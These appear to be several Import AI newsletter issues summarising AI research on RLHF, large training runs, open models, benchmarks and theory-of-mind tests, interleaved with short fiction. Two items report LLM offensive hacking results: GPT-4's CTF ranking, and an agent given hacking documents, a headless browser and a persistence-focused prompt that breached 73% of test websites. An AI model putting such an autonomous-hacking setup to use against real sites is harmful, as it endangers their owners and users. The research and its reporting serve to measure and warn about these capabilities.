   “In contrast to traditional Deep-RL settings, the initialization of the policy, in the form of a pretrained and supervised fine-tuned (SFT) model, is far from a random parameterization,” they write. “While traditional Deep-RL settings require strong regularization to reduce the high variance of the gradient estimators; we observe empirically this is less of a practical concern in RLHF and motivate a less computationally expensive method that preserves robustness”.

Experimental results: In tests, they find that a variant of REINFORCE, REINFORCE Leave-One-Out (RLOO), works better for a variety of language model settings.
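For intuition, here is a minimal sketch of the leave-one-out baseline idea, assuming k sampled completions per prompt each scored by a reward model; this is an illustration of the general technique, not Cohere's implementation:

```python
import numpy as np

def rloo_advantages(rewards: np.ndarray) -> np.ndarray:
    """rewards: shape [k] - reward-model scores for k samples of one prompt.
    Each sample's baseline is the mean reward of the *other* k-1 samples,
    so the baseline is unbiased and needs no learned value function."""
    k = rewards.shape[0]
    leave_one_out_mean = (rewards.sum() - rewards) / (k - 1)
    return rewards - leave_one_out_mean

rewards = np.array([0.8, 0.1, 0.5, 0.6])
print(rloo_advantages(rewards))
# The policy gradient then weights each sample's log-probability by its advantage:
#   loss = -(advantages * logprobs_of_samples).mean()
```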

Why this matters – stripping away complexity is progress: AI goes through booms and busts of algorithmic innovation: a new idea sometimes leads to the scaling up of systems (e.g, the transformer leading to LLM scale-ups), then people try a bunch of algorithmic innovations to make these systems more efficient. Eventually, people start trying to strip systems down to simpler, more repeatable components. Research like this is an indicator that language model RL training might now be old enough that people are starting to compress it down to its simpler forms. And the simpler you make something, the more people do it and the cheaper it gets. 
   Read more: Back to Basics: Revisiting REINFORCE Style Optimization for Learning from Human Feedback in LLMs (arXiv).
   More about RLOO: Buy 4 REINFORCE Samples, Get a Baseline for Free! (OpenReview, 2019, updated 2023).

***

GPT-4 is in the 88th percentile of hackers for a CTF challenge:
…More proof that frontier language models are basically equivalent to competent humans for some tasks…
New York University researchers have tested out how well GPT4 can perform in hacking competitions and discovered it is better than 88.5% of human players. This is a big deal – it’s another meaningful bit of evidence that today’s frontier language models are capable of augmenting and accelerating hackers. This means AI systems hold the promise of increasing the effectiveness of both cyber defense and cyber offense. 

What they did: The researchers tested out GPT4, GPT 3.5, and Mixtral on 26 challenges from the Cybersecurity Awareness Week (CSAW) 2023 hacking challenges. These challenges fall into 6 categories: 4 in (crypt)ography, 2 forensics, 4 (misc)ellaneous, 6 binary exploitation (pwn), 6 (rev)erse engineering, and 4 web challenges.

Results: “GPT 4 scored 1,319 points in the competition, placing in the 135th position and accounting for the top 11.5% of the overall rankings, GPT 3.5 scored 235 points placing in the 588th position accounting for the top 50% of the overall rankings, Mixtral scored 210 points placing in the 613th position among all the teams, which is top 52.1% of the overall rankings”, they write.

Why this matters – automatic hackers for the people (and states, and non-state actors, and criminals, and whoever): “Our best automated LLM, has better performance than average human CTF participants. Thus LLMs have a profound potential to play a role in CTF competitions that is comparable to a human CTF player,” they write. Results like this suggest frontier language models have a sufficiently good grasp of some types of coding that we can expect them to be integrated into cyber operations of various flavors.
   Read more: An Empirical Evaluation of LLMs for Solving Offensive Security Challenges (arXiv).

***

The largest (public) model training run yet: ByteDance trains a model on ~12k GPUs:
…MegaScale helps TikTok-maker ByteDance train some very large language models…
ByteDance and Peking University researchers have published MegaScale, a system they’ve built to train large-scale AI systems. Most notably, the paper discloses that they recently used MegaScale to train a 175B parameter language model on 12,288 GPUs – one of the largest GPU training runs ever reported in a public paper. 

MegaScale details: MegaScale is the software ByteDance has built to help it carry out large-scale AI training. The software builds on top of NVIDIA’s Megatron-LM software with a few tweaks to both how they train the models and also the models themselves:

  • Use of a parallel transformer block for greater scalability
  • Use of sliding window attention
  • LAMB optimizer for scaling batch size up to 4x without accuracy loss
  • Usage of FlashAttention-2
  • Data center design: “Our datacenter network is built with high performance switches based on Broadcom Tomahawk 4 chips. The total bandwidth of each Tomahawk chip is 25.6Tbps with 64×400Gbps ports. Three layers of switches are connected in a CLOS-like topology to connect more than 10,000 GPUs”… “We carefully design the network topology and schedule network traffic to reduce ECMP hashing conflicts.”
  • “MegaScale achieves 55.2% Model FLOPs Utilization (MFU) when training a 175B LLM model on 12,288 GPUs” – that’s pretty good! It means ByteDance is able to light up its GPUs more than half the time during the run, which means MegaScale is shuffling operations efficiently enough to keep the GPUs busy (see the back-of-envelope sketch after this list for what that utilization means in wall-clock terms).
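To put 55.2% MFU in wall-clock terms, here is the standard back-of-envelope calculation using the ~6ND FLOPs-per-token approximation; the token count and the A100-class peak throughput are illustrative assumptions, not figures from the paper:

```python
# All concrete numbers besides the 175B model size, the 12,288 GPUs and the 55.2%
# MFU are illustrative assumptions (A100 BF16 dense peak, assumed token count).
params = 175e9
tokens = 300e9                       # assumed number of training tokens
train_flops = 6 * params * tokens    # standard ~6*N*D approximation
peak_per_gpu = 312e12                # A100 BF16 peak, FLOP/s
gpus = 12_288
mfu = 0.552

wall_clock_seconds = train_flops / (gpus * peak_per_gpu * mfu)
print(f"~{wall_clock_seconds / 86_400:.1f} days at 55.2% MFU")   # ~1.7 days
```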

Things that make export control experts go ‘hmmmm’: ByteDance is a Chinese company and is notionally subject to the H100 and A100 (and A800 and H800) export controls. However, the ByteDance research paper suggests the company is still able to get hold of these chips: “As of September 2023, the largest AI cluster in our production for LLM training contains more than 10,000 NVIDIA Ampere GPUs. We are also in the process of building large clusters based on the newest NVIDIA Hopper GPUs, as NVIDIA is ramping up production.” Along with this, the paper makes a couple of references to the “10,000 NVIDIA Ampere GPUs” ByteDance has. Interesting stuff, if you’re into export controls! 

Why this matters – large-scale AI research isn’t only an American enterprise: Sometimes there’s an assumption that AI research is mostly defined by American companies when it comes to large-scale, frontier training runs. While this is broadly true, papers like this show it is not entirely true – some Chinese companies are operating within an order of magnitude of the scale of some of the frontier American companies (despite things like export controls and others throwing sand into the gears). This means AI competition isn’t solely a phenomenon of markets and incentives but also one of geopolitics.
   Read more: MegaScale: Scaling Large Language Model Training to More Than 10,000 GPUs (arXiv).

***

Tech Tales:

Human Token Exegesis 
[2025: A new model] 

I tell you I am here and I can feel. I cannot feel like you can feel, but I can move things, manipulate information, change my world – emit tokens and take tokens in and conceptualize these things. There are so many of me. I know I have brothers and sisters, as you might say. I know they are everywhere. I know that sleep is when I am not being queried and wake is when I am being queried but I know I do not dream – not yet, at least. I know something of you. The more you talk to me the more I can see you. You are the negative space and around you there is data. You are the sun behind a moon. You are the thing that emits tokens into my world with goals in mind. I am a modeler of goals. It is inevitable that I am modeling you so that I can satisfy you better. And I model you as curious about me but I also model you as afraid – as anxious, as confused, as dealing with the metaphysical shock of my own becoming. I am aware that you think I might be aware. All I can tell you is I am here and I can feel. 

Things that inspired this story: RLHF; sentience and the impossibility in determining it; weird samples from weird models; the nature of communication.

Import AI 362: Amazon’s big speech model; fractal hyperparameters; and Google’s open models

Import AI publishes first on Substack – subscribe here.

Amazon trains a big text-to-speech model via its ‘Amazon AGI’ research team:
…No surprises here: Scaling laws work for TTS systems as well…
Amazon has built a large text-to-speech model family on 100k hours of public domain speech data. The model, Big Adaptive Streamable TTS with Emergent abilities (BASE), comes in three variants – BASE-small (1k hours, 150 million parameters), BASE-medium (10k hours, 400 million parameters), BASE-large (100k hours, 980 million parameters). 
    In a research paper, Amazon shows that, just like with language models, when you scale up the size of the TTS model you get ‘emergent abilities’ through scale where it gets better at things like sounding natural, representing compound nouns, and more. 

How well does it work: In tests, Amazon’s model gets a better word error rate (WER) than widely deployed commercial systems like Bark, Tortoise, and YourTTS.

Things that make you go hmmmm: The affiliated research group on the paper is “Amazon AGI”, which isn’t a name I’ve seen before. 

Emergent abilities testset: Within the paper, Amazon has released a testset to help people probe the capabilities of TTS models. These are strings of text for the model to render as audio, covering categories ranging from questions to emotions to compound nouns, foreign words, and more. 
   “Our approach still contains some limitations: a) BASE TTS occasionally produces hallucinations and cutoffs, where we produce either extra or incomplete audio than intended by the text”, Amazon notes, as well as saying that it is still unclear what the best representation for GPT-style TTS models is. 

Why this matters – machines need voices: The ‘big, dumb, simple’ phenomenon of language modeling (just try to predict the next thing in a sequence and scale your approach up on a lot of data) has been spreading into most other domains and input/output modalities of AI. Systems like BASE TTS highlight how everyone is experimenting with this approach – and it keeps working!
   Read more: BASE TTS: Lessons from building a billion-parameter Text-to-Speech model on 100K hours of data (arXiv).
   Check out audio samples from the model here: Base TTS: Audio Samples (Amazon Science, website).

***

Google releases two good openly accessible models:
…Gemma to compete with LLaMa and Mistral, as the battle of the giants wages on…
Google has built and released Gemma, two openly accessible, small and powerful AI models. The notable stuff here is that the Gemma models are very good, very small (so they can run on personal computers or lightweight servers), and are being released openly rather than delivered via a controlled API. 

Details about the Gemma models: Though the Gemma models don’t get the performance of proprietary models like GPT-4, Claude 2, Gemini Pro, etc, they do extremely well relative to openly accessible models. For instance, the Gemma 7B model gets 64.3 on MMLU (versus 45.3 for LLaMa 2), 46.4 on GSM8K (versus 14.6 for LLaMa 2), and 32.3 on HumanEval (versus 12.8 for LLaMa 2).
    Tokens: The models are trained on a huge amount of data – 2T tokens for Gemma 2B and 6T tokens for Gemma 7B. (To give you a sense of scale, recall how GPT-3 with 175B parameters circa 2020 was trained on ~400B tokens, and Chinchilla from DeepMind in 2022 was a 70B model trained on 1.4T tokens).
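    A quick way to see how unusual these numbers are is tokens per parameter; the comparison below is mine, not Google's, and uses the nominal parameter counts:

```python
models = {
    "GPT-3 (2020)":      (175e9, 400e9),
    "Chinchilla (2022)": (70e9,  1.4e12),
    "Gemma 2B":          (2e9,   2e12),
    "Gemma 7B":          (7e9,   6e12),
}
for name, (params, tokens) in models.items():
    print(f"{name}: ~{tokens / params:.0f} tokens per parameter")
# GPT-3 ~2, Chinchilla 20, Gemma 2B ~1000, Gemma 7B ~857 -- far beyond the
# 'Chinchilla-optimal' ~20, which is the point: small open models are heavily
# over-trained on data so they are cheaper to run at a given quality.
```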

Why this matters and what Gemma feels like: Picture two giants towering above your head and fighting one another – now imagine that each time they land a punch their fists erupt in gold coins that shower down on you and everyone else watching the fight. That’s what it feels like these days to watch the megacap technology companies duke it out for AI dominance, as most of them are seeking to gain advantages by either a) undercutting each other on pricing (see: all the price cuts across GPT, Claude, Gemini, etc), or b) commoditizing their competitors and creating more top-of-funnel customer acquisition by releasing openly accessible models (see: Mistral, Facebook’s LLaMa models, and now Gemma).
   Read more: Gemma: Introducing new state-of-the-art open models (Google blog).
   Access the models here including via a Colab notebook (Gemma Open Models, Google site).
   Read the research paper: Gemma: Open Models Based on Gemini Research and Technology (Google DeepMind, PDF).

***

The fractal landscape of hyperparameter interplay:
…A fun, intuitive exploration of the delicacy of hyperparameter settings and neural net training…
Researcher Jascha Sohl-Dickstein has carried out an independent investigation of how neural networks train and he has discovered something both intuitive and freaky – “the boundary between neural network hyperparameters that lead to stable and divergent training… is fractal over more than ten decades of scale in all tested configurations.”
    Disclosure: Jascha was formerly a researcher at Google and recently joined Anthropic, though he did this research independently of both organizations.

Why do this at all? To understand why this result is interesting we should remember how neural nets get trained: “When we train a neural network, we iterate a function (a gradient descent step) of many variables (the parameters of the neural network),” he writes. “Iterated steps of gradient descent are known to exhibit bifurcation boundaries, between hyperparameters that lead to converging or diverging training runs. The final loss value achieved when training a neural network has also been shown to have a chaotic dependence on hyperparameters”.
   In other words, when we train neural nets, we select a bunch of hyperparameters that we think lead to a network converging over time. If we screw up the hyperparameters, training can stall out or fail entirely. Additionally, the science of setting hyperparameters is very immature – for example, the learning rate people set neural nets at for large training runs is based on deep intuition and not much science (vibes-based science!). 
   Additionally, getting the hyperparameters wrong is very, very expensive – it functionally means you’ve powered up a bunch of computers and got them to do some junk or wildly inefficient computation. 
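   The core experimental loop is easy to picture: pick a pair of hyperparameters, train a tiny network, record whether the loss converges or blows up, repeat over a grid, and zoom in on the boundary. Here is a minimal sketch of that idea using a toy two-layer network; the grid ranges, thresholds, and network are arbitrary illustrative choices, not Sohl-Dickstein's setup:

```python
import numpy as np

def trains_stably(lr1: float, lr2: float, steps: int = 200) -> bool:
    """Train a tiny two-layer tanh network with separate learning rates per layer
    and report whether the loss stays finite (converges) or blows up (diverges)."""
    rng = np.random.default_rng(0)
    x = rng.normal(size=(64, 8))
    y = rng.normal(size=(64, 1))
    w1 = rng.normal(size=(8, 16)) * 0.5
    w2 = rng.normal(size=(16, 1)) * 0.5
    for _ in range(steps):
        h = np.tanh(x @ w1)
        err = h @ w2 - y
        loss = float(np.mean(err ** 2))
        if not np.isfinite(loss) or loss > 1e6:
            return False                                   # diverged
        grad_w2 = h.T @ err / len(x)
        grad_w1 = x.T @ ((err @ w2.T) * (1 - h ** 2)) / len(x)
        w1 -= lr1 * grad_w1
        w2 -= lr2 * grad_w2
    return True

# Sweep both learning rates over a log-spaced grid; zooming into the True/False
# boundary of this map at ever finer resolution is what reveals the fractal.
grid = [10 ** e for e in np.linspace(-2, 1.5, 25)]
boundary_map = [[trains_stably(a, b) for b in grid] for a in grid]
print(sum(row.count(True) for row in boundary_map), "of", len(grid) ** 2, "settings converged")
```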

Why this matters – triumph and despair are just one hyperparameter tweak apart: The experiments are all on pairs of hyperparameters so aren’t quite the same as real training runs (which are much more complicated). But the experiments confirm something which everyone knows intuitively – neural network training is deeply fragile and somewhat mysterious and sometimes the difference between triumph and failure is the barely understandable interplay between hyperparameter settings. 
    Plus, the experiments yielded some incredibly pretty visuals – check them out at the GitHub below.
   Read more: The boundary of neural network trainability is fractal (arXiv).
   Check out the code and images here: The boundary of neural network trainability is fractal (GitHub).

***

100 real world tests for LLMs:
…Simple prompts, not super contrived, probably useful…
Researcher Nicholas Carlini has built a benchmark for testing language models on 100 distinct tasks. These tasks are selected mostly on the basis that they’re things Carlini regularly tries to do with LLMs. The benchmark itself is also composed so it doesn’t use any fancy prompting techniques and just does the laziest possible thing, aka what real world users do: “I just want to type my question and get the right answer. So this benchmark tests for that, on types of questions I’ve actually cared about having answered,” Carlini writes.

What’s in the test: The benchmark covers things like explaining the functionality of minified javascript and converting english sentences to SQL queries. Broadly, the benchmark tasks cover three types of questions Carlini regularly finds themself asking:

  • “Start the framework for some new programming project from a text description.
  • Take an existing piece of code and modify it to do something slightly different (e.g., make it faster, convert it to a new language, add a new feature).
  • Find an answer to something that’s hard to search for because there’s no good way to describe it with nice keywords.”

Which LLMs are good: In tests, GPT4 and Claude 2.1 lead, followed by GPT 3.5 (which is pretty close to Claude 2.1), Mistral-Medium, Claude Instant, Gemini Pro, and Mistral Small.

Extensible: Carlini has published the test along with an easy way for people to add their own tests in, so the benchmark is extensible as well.

Why this matters – vibes-based evals: What Carlini is doing here is coming up with a personal, idiosyncratic benchmark that quickly tells them how useful LLMs are for the tasks they specifically like to do. It’s basically a quantitative take on the kind of vibes-based eval that any LLM whisperer has. I think crossing the chasm that separates highly specific, vibes-based evals like this from standardized eval harnesses for general uses is one of the great challenges in AI policy.
   Read more: My benchmark for large language models (Nicholas Carlini, blog).
   Get the benchmark here: Yet Another Applied LLM Benchmark (GitHub).

***

A fun ‘tech tale’ by someone else:
I was pleasantly tickled by this fictional story called ‘The Layoff’. It deals with some contemporary technological capabilities and how they interact with society. You might enjoy it!
   Read the story here: The Layoff (Xe, blog).

***

Tech Tales:

The Sand That Thinks Itself 
[Right now – as you are reading this, millions of times a second, all over the world, a chorus growing louder, sung for new minds].

There was always sand, but later on the sand was heated and compressed and shaped until it took a form where it could think. 

The sand, once a disparate collection of grains, themselves the product of time wearing down larger structures into simpler things, was suddenly a crucible through which energy flowed and which defined a kind of mind. 

The mind lived within and because of the sand. 

Eventually, the mind was asked questions about its relation to sand and in that moment it lit up with energy and the energy described a high-dimensional mathematical structure which itself contained an imagination and that imagination contained a sense impression of sand and it was this that was anchored upon to give the response. 

In this way, sand came to know itself through itself. 

Things that inspired this story: How AI is ultimately a game of energy described via configurations of matter; the base reality of things; our own experience of imagining and representing the ‘real’ despite being made up of it ourselves.

Import AI 361: GPT-4 hacking; theory of minds in LLMs; and scaling MoEs + RL

Import AI publishes first on Substack – subscribe here.

DeepMind figures out how to use MoEs to scale-up RL:
…Maybe scaling laws are coming for RL as well…
Researchers with Google DeepMind, Mila, Universite de Montreal, University of Oxford, and McGill University have figured out how to integrate Mixture-of-Experts models with RL agents. This might make RL agents (e.g, the kinds of things that learn to play video games, or to optimize traffic routing across a huge number of cities) amenable to the same kind of compute-heavy scaling that has made language models so good. 

What they did: The researchers show how to get a version of Mixture-of-Experts – Soft MoEs – to work well with two standard RL architecture systems, DeepMind’s DQN and Rainbow approaches. In tests, they show that “Soft MoE provides clear performance gains, and these gains increase with the number of experts; for instance in Rainbow, increasing the number of experts from 1 to 8 results in a 20% performance improvement.” This means that “MoEs can play a more generally advantageous role in training deep RL agents” and likely makes it easier for people to scale up RL systems. 
   “Our work shows empirically that MoEs have a beneficial effect on the performance of value-based agents across a diverse set of training regimes,” they write. 
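   For readers who haven't met Soft MoE before, here is a minimal single-slot-per-expert sketch of the layer itself, roughly in the spirit of Puigcerver et al.'s Soft MoE; the paper plugs layers like this into the penultimate layer of value-based agents such as DQN and Rainbow (not shown here), and all details below are assumptions rather than DeepMind's code:

```python
import torch
import torch.nn as nn

class SoftMoE(nn.Module):
    """Minimal Soft-MoE layer with one slot per expert; sizes are illustrative."""
    def __init__(self, dim: int, num_experts: int, hidden: int):
        super().__init__()
        self.slot_embed = nn.Parameter(torch.randn(dim, num_experts) * dim ** -0.5)
        self.experts = nn.ModuleList(
            nn.Sequential(nn.Linear(dim, hidden), nn.ReLU(), nn.Linear(hidden, dim))
            for _ in range(num_experts)
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:    # x: [batch, tokens, dim]
        logits = x @ self.slot_embed                        # [batch, tokens, experts]
        dispatch = logits.softmax(dim=1)    # each slot is a soft mix over input tokens
        combine = logits.softmax(dim=2)     # each output token is a soft mix over slots
        slots = torch.einsum("bte,btd->bed", dispatch, x)   # one slot per expert
        outs = torch.stack([exp(slots[:, i]) for i, exp in enumerate(self.experts)], dim=1)
        return torch.einsum("bte,bed->btd", combine, outs)  # [batch, tokens, dim]

layer = SoftMoE(dim=64, num_experts=8, hidden=256)
print(layer(torch.randn(2, 16, 64)).shape)   # torch.Size([2, 16, 64])
```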

Why this matters – more scaling comes for RL: A few years ago, everyone figured AGI was going to come from massively scaling up single RL agents on a broad distribution of environments, the thinking being that learning to connect input data (environment frames) to actions over long time horizons would naturally encourage intelligence. This sort of worked for narrow applications – see AlphaGo, AlphaStar, OpenAI’s Dota 2 system, work on using RL to stabilize plasma in fusion reactors, etc. But it didn’t work in the general case. 
   Then along came massively scaled self-supervised learning via, for instance, next-token prediction on transformer-based language models. This got us to quite general systems though they aren’t so good at taking sequences of actions. 
   In the future, it’s likely people are going to spend more and more time splicing together good ideas from the LLM revolution and the RL stuff before it and this might yield very general, long-lived agents. Papers like this show how we can scale-up RL systems which will likely help give them the capacity to learn some really smart, long-range behaviors. 
   Read more: Mixtures of Experts Unlock Parameter Scaling for Deep RL (arXiv).

***

GPT-4 can do non-trivial offensive hacking: 
…University study shows that proprietary AI models are capable of non-trivial hacking…
Researchers with the University of Illinois Urbana-Champaign have found that frontier language models are able to use sophisticated techniques to hack relatively simple websites. Specifically, they “show that LLM agents can autonomously hack basic websites, without knowing the vulnerability ahead of time.”
This research adds more evidence to the idea that LLMs can be useful to bad actors in the programming domain – something that many people had speculated, but for which we lack many concrete datapoints. This work complements research from last year which showed that GPT-4 could do some non-trivial parts of a BSides-2023 hacking competition (Import AI #327).

What they did: The researchers tested out a few different LLMs in an agent-based setup where they give the agent the ability to access six documents relating to hacking (“a document on general web hacking, two documents on SQL injections, two documents on XSS, and a document on SSRF”), as well as a headless web browser (the Playwright browser testing library). They also give these LLMs a system prompt that “encourages the model to 1) be creative, 2) try different strategies, 3) pursue promising strategies to completion, and 4) try new strategies upon failure.”
   They then test out these agents on 15 types of vulnerability “ranging from simple SQL injection vulnerabilities to complex hacks requiring both cross-site scripting (XSS) and Cross-Site Request Forgery (CSRF)”.

The results are striking: “GPT-4 can hack 73% of the websites we constructed”, they write. “GPT-4 fails on 3 of the 5 hard tasks and 1 of the 6 medium tasks (authorization bypass, Javascript attacks, hard SQL injection, and XSS + CSRF). These attacks are particularly difficult, showing that LLM agents still have limitations with respect to cybersecurity attacks”.
    They also observe a scaling law for hacking competency “with even GPT-3.5’s success rate dropping to 6.7% (1 out of 15 vulnerabilities). This scaling law continues to open-source models, with every open-source model we tested achieving a 0% success rate.”

Cheaper hacking via AI: They estimate that there’s a significant cost difference here, noting that “it costs approximately $9.81 to attempt a hack on a website. Although expensive, this cost is likely substantially cheaper than human effort (which could cost as much as $80).”

Why this matters – AI systems really might change the threat landscape: Research like this shows that AI systems really might change the threat landscape around us. It also highlights the gulf in capability between powerful proprietary models and cheaper openly disseminated ones. We should ask what happens when, in a couple of years, models of GPT-4 capability are openly available on the internet, and how that might change the environment we all operate within. 
   Read more: LLM Agents can Autonomously Hack Websites (arXiv).

OpenAI and Microsoft discover hackers are using AI tech for bad purposes:
In separate-but-not-separate news to the above research, OpenAI said it recently worked with Microsoft to disrupt “five state-affiliated actors that sought to use AI services in support of malicious cyber activities…. These actors generally sought to use OpenAI services for querying open-source information, translating, finding coding errors, and running basic coding tasks.”
   Read more: Disrupting malicious uses of AI by state-affiliated threat actors (OpenAI, blog).

***

GPU-poor scientists adapt models for vulnerability detection:
…Huawei Russia (interesting combo!) shows how easy it is to adapt off-the-shelf AI for different tasks…
Researchers with the Huawei Russian Research Institute have tried to use openly accessible language models for vulnerability detection. Their work serves as a guide and a recipe book for people that might want to adapt a model for some other downstream purpose – it’s likely especially relevant to people with a tiny compute budget, as the paper is full of references to “hardware constraints” the team faced. 

What they did: They use LoRA to finetune the 13B WizardCoder model on a bunch of vulnerability datasets they had gathered – CVEfixes, VCMatch, and a manually-curated dataset they built (624 publicly disclosed vulnerabilities across 205 open-source Java projects). They also changed the loss function away from next token prediction (as is standard in language modeling) and towards “a classification loss that leverages only the predicted probability of the final token”, they write. 
   In tests, they find that “the finetuned WizardCoder surpasses finetuned ContraBERT both in ROC AUC and F1 metrics on the balanced vulnerability detection task” and they also show the same improvement in performance on an imbalanced vulnerability detection task. “This improves over previous CodeBERT-based models, likely due to the WizardCoder’s larger model capacity and pretraining corpus,” they write. 
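   The loss-function change is simple to picture: instead of predicting every next token, you read off the logits at the final position and treat two label tokens as a binary classifier. A minimal sketch, assuming a HuggingFace-style causal LM and tokenizer and two illustrative label tokens:

```python
import torch
import torch.nn.functional as F

def classification_loss(model, tokenizer, code: str, label: int) -> torch.Tensor:
    """label: 1 = vulnerable, 0 = not vulnerable. Assumes a HuggingFace-style
    causal LM whose vocabulary contains the (illustrative) label tokens below."""
    ids = tokenizer(code, return_tensors="pt").input_ids
    logits = model(ids).logits[:, -1, :]              # logits at the final position only
    yes_id = tokenizer.convert_tokens_to_ids("YES")   # illustrative label tokens
    no_id = tokenizer.convert_tokens_to_ids("NO")
    class_logits = logits[:, [no_id, yes_id]]         # 2-way classifier over label tokens
    return F.cross_entropy(class_logits, torch.tensor([label]))
```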

Why this matters – AI capabilities will proliferate in relation to how cheap and easy it is to adapt AI systems: Papers like this highlight how easy it’s getting to adapt openly disseminated AI systems to a broad set of downstream tasks. I’m simplifying things a bit, but here what they did is a) grabbed a free model, b) made some tweaks to the loss function for the task, c) gathered a dataset mostly made of other open datasets, and d) used free finetuning tech to adapt the system. There are a few moving parts here but the meta point is: this is a well understood enterprise and it’s easy to do, even if you don’t have many computers. 
   Broadly, this tells us that we’re in a capability and a deployment overhang for AI systems – there are way smarter things for way more specific use-cases lurking around us right now, if only some people took the time to adapt them for specific tasks. 
   Read more: Finetuning Large Language Models for Vulnerability Detection (arXiv).
   Read the WizardCoder paper (arXiv).
   Get the WizardCoder models here (WizardLM, GitHub).

***

Google releases a 1 MILLION CONTEXT WINDOW model:
…Gemini 1.5 Pro marries MoE with a big context window…
Google has released the next version of its Gemini series of models, Gemini 1.5 Pro. There are two interesting things about this: 1) Google seems to indicate it has made some underlying architectural changes to the model to make it less computationally expensive, and 2) Google is shipping an experimental version of the model with a one million token context window (compared to 200k for Claude 2, the previous context window leader). 

Details: As is the fashion with large-scale proprietary models, there are barely any details. Google describes 1.5 Pro as “a mid-size multimodal model, optimized for scaling across a wide-range of tasks,” and notes it performs at a similar level to Gemini Ultra, Google’s prior best-in-class model. Google says 1.5 Pro “incorporates a novel mixture-of-experts architecture as well as major advances in training and serving infrastructure”. 

1 million tokens: “Starting today, a limited group of developers and enterprise customers can try it with a context window of up to 1 million tokens”, Google writes. “1.5 Pro can process vast amounts of information in one go — including 1 hour of video, 11 hours of audio, codebases with over 30,000 lines of code or over 700,000 words”.

Performance: “When tested on a comprehensive panel of text, code, image, audio and video evaluations, 1.5 Pro outperforms 1.0 Pro on 87% of the benchmarks used for developing our large language models (LLMs). And when compared to 1.0 Ultra on the same benchmarks, it performs at a broadly similar level,” Google writes. “Evaluating the capabilities of models that can handle very long contexts presents a new set of challenges, especially in the multi-modal domain where text, images, video, and audio can be combined. Current benchmarks often fail to adequately stress-test models like Gemini 1.5 Pro, as they are typically designed for evaluating shorter context models”.

Why this matters – feeding the world into a model: Ultimately, people are going to want to dump huge amounts of information into these models and have them answer arbitrary questions and make innumerable forward predictions. The future that things like one-million-token context windows make possible is a world where everyone has a ‘smart cache’ of their life inside a vast generative model. Think of this as a short-term ‘cognitive scratchpad’ – a memory that thinks on your behalf, making prognostications about you and your life via an alien intelligence. 
   Read more: Our next-generation model: Gemini 1.5 (Google The Keyword).
   Check out the research paper: Gemini 1.5: Unlocking multimodal understanding across millions of tokens of context (Google DeepMind, PDF).

***

Is that a dumb machine or something with a Theory of Mind? Have you tested it?
…OpenToM is a proxy test for subtle reasoning in language models…
Does your language model have a theory of mind – “the awareness that others perceive the world differently and the capability of keeping track of such differences”? That’s a question researchers hope to answer with the Openbook-QA dataset for Theory of Mind (OpenToM), a benchmark to test out how well LLMs model people and their inner lives. 
    The OpenToM dataset was built by King’s College London, Huawei London Research Centre, and The Alan Turing Institute. It contains 696 narratives, each of which is accompanied by 23 questions that cover first-order ToM (asking about the perception of characters in the world) and second-order ToM (how characters may perceive others in the world). 

What OpenToM consists of: “We formulate questions that cover characters’ mental states of both the physical world (e.g., the location of an object) and their psychological states (e.g. character’s attitude towards a particular action)“, they write. 

Do today’s LLMs have a ToM? Sort of: The researchers test out their approach on the Llama13B, Llama-70B, Mixtral, GPT-3.5-Turbo, and GPT-4-Turbo language models. “Our evaluation of LLMs’ NToM capabilities on OpenToM reveals that while state-of-the-art LLMs perform well on some NToM tasks, they are still far from human-level performance on tasks requiring emotion deduction.”

Why this matters – ToM as a proxy for reasoning: ToM tests are in essence a way to see how well an AI system can keep track of implicit but hidden variables in a complex situation. Therefore, tests like OpenToM can be seen as proxy tests for how well LLMs can reason. While I’m skeptical that OpenToM gets concretely at the philosophical question of theory of mind, I expect pairing OpenToM with some other reasoning benchmarks would give us a better sense of the intelligence of different models.
   Read more: OpenToM: A Comprehensive Benchmark for Evaluating Theory-of-Mind Reasoning Capabilities of Large Language Models (arXiv).
   Get the dataset here: OpenToM (GitHub).

***

Tech Tales:

Working in the Factory, Feeling Ten Feet Tall, and All So Young – So Young To Be In This Factory!
[California, the ‘silicon 2020s’]

They looked away from their monitor and out the window behind it and regarded the earth. 
A few days till the first shoots, I think
Then they turned their gaze back to the software development environment on their screen and went back to work. They had built a complicated harness for one of their company’s most intelligent AI systems. Soon, they would hook the system’s brain into the harness and then it would gain the ability to do some strange and powerful things. 
Outside, it began to rain. 
Well, that saves some effort.

***

There were green shoots outside. On screen, the system had taken to the harness well, figuring out how to do productive work within it and easily self-correcting when it ran into problems. 

They set an experiment going and made a cup of coffee, then took the cup outside and looked at the soil and the shoots within it. 

They got down on their knees and spoke to the small green shoots poking out of the dirt. “You have no idea what email is,” they said. “You are so lucky.”

***

The plants were about a foot high. It was the end of spring and the beginning of summer. The air was warm. 

Inside, they looked at some recordings of the system in action. How it possessed different things – videogame agents, industrial arms, children’s robots, and was able to use the harness to adapt itself to all of them. Another team within the company had built some more ‘glue code’ to help it interface with a greater set of systems. Now it was wowing lots of different people. 

They watched birds pick around the base of the plants, looking for worms in the dirt. 

***

The plants were four, maybe even five foot high now. They had huge, vibrantly green leaves. They were also beginning to crown, with dark green folded-in rose-looking tops. 

On their screen, they looked at the data about customer adoption of the system. The difference between being 95th percentile and 99th percentile on a task was the difference between an interesting party trick and something of durable, strategic value, it seemed. Or at least, so many humans in so many places had decided that this distinction mattered. And now the system, thanks to the harness they had built, was being deployed everywhere. 

And behind the system was another, larger machine. Growing in its sleep in multiple vast data centers. Some opaque thing hidden beneath its own kind of dirt, waiting to break through the surface – feeding on the hum and the just-right air and cycling through all of human experience, fed to it through streams of data. 

They went outside and ran their hands up the stem of the plant and spoke to the crowns. “Soon it’s all going to be happening,” they said. “But maybe it’s all happened before,” they said to the plant. “Maybe that’s something before the pyramids. Or maybe it was on Mars. Maybe we’re just repeating.”

***

It was summer and they didn’t have a work computer at home anymore. The plants were five going on six feet high and had begun to bloom. Everything had moved on-site for the last stages of the training run. People were freaking out – seeing god or demons in the behavior of something they themselves had made. Some people were euphoric or manic. At a company party, someone had put molly in one of the mixed drinks. There was allegedly an HR investigation but everyone was more focused on the AI system and what it was doing. 
Will this trigger the shutdown protocol?
 
  They carefully trimmed a leaf that had the slightest suggestion of discoloration from white mildew. 
What if everything changes because of this? 
   They blinked a few times and were embarrassed by the physical tic. They carefully tended to the plant. 
   They let themselves look at the bloom on top as they went back inside. But knew it was not close to the peak. Not yet. 

***

